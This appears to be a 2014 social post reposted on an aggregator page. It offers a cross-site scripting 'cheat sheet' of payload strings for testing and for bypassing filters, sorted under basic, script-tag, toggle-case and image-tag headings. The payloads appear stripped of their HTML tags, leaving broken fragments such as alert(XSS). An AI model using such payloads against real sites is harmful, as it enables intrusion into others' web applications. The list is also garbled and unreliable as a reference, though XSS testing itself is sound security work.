Here we go with 1st part - TopicsExpress



          

Here we go with 1st part : _____________________________________________________ I am just providing this XSS Cheat sheet after collecting the exploit-codes from hackers techniques and different sites. This is complete list of XSS cheat codes which will help you to test xss vulnerabilities ,useful for bypassing the filters Basic XSS codes: ---------------------------------- alert(XSS) alert(XSS); alert(XSS) >alert(XSS) alert(/XSS) alert(/XSS/) When inside Script tag: --------------------------------- alert(1) ‘; alert(1); )alert(1);// Bypassing with toggle case: -------------------------------------- alert(1) XSS in Image and HTML tags: --------------------------------------------- >alert(String.fromCharCode(88,83,83)) You can combine the above mentioned codes and make your own cheat code.
Posted on: Thu, 10 Apr 2014 05:19:35 +0000

Trending Topics




© 2015